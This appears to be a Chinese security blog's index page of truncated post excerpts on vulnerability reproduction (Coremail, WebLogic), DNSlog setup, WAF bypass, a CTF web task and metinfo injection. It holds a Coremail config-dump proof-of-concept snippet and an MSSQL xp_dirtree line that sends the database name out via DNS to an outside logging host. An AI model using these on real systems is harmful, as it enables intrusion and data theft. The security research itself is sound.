import requests,sys def mailsmsPoC(url): url = url + "/mailsms/s?func=ADMIN:appState&dumpConfig=/" r = requests.get(url) if (r.status_code != '404') and ("/home/coremail...
CVE-2019-2725 复现
Docker 搭建环境 docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest http://localhost:49163/console User: weblogi...
通过宝塔面板搭建dns_log 平台
开源的DNS_log 平台 https://github.com/BugScanTeam/DNSLog 下载源代码 [root@btmail ~]# cd /dnslog/ [root@btmail dnslog]# git clone https://github.com/BugScanTeam/DNS...
mssql 无回显 注入
DECLARE @host varchar(128); SELECT @host=(select db_name())+ '.hfkzaq.ceye.io'; select @host; EXEC('master..xp_dirtree "\\'+@host+'\foobar$"'); ...
DNS log 学习
DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问 www.o2oxy.cn 时. 最后面访问的还是该域名的NS 服务器。阿里云的域名的NS 记录都是可以修改的。也就是说。如果我们本地建立一...
密码保护:新思路多句话过D盾、安全狗、阿里云等WAF 思路延长
思路真的可以,但我测试的时候发现网络延迟是最大的难题 原文:https://www.t00ls.net/thread-51085-1-2.html 日常我们遇到的WAF对webshell查杀拦截主要是通过文件内容分析查杀,和网络传输层面...
密码保护:某waf bypass 实践
某waf bypass 实践 不知何时想绕过某waf 然后搭建了一个测试环境 一个xss 环境和一个sql注入环境 分别存储xss 和反射xss get 注入和post 注入 测...
CNVD-C-2019-48814 复现
CNVD-C-2019-48814 WebLogic wls9-async反序列化远程命令执行漏洞 Docker 搭建环境 docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 49164:7002...
记录一道web题目
http://95d0deaf1ade4dada96134a916bce5e1ab4dfa4227fb4400.changame.ichunqiu.com/ php协议读取文件 读取到index.php <?php error_reporting(0); $file = $_GET["fi...
metinfo 6.2.0前台注入分析
概述 看到某个表哥发的metinfo 6.13最新注入(https://xz.aliyun.com/t/4508),以前我发过metinfo利用注入getshell的文章,这里正好可以结合。(https://nosec.org/home/detail/2324.html)。 利用...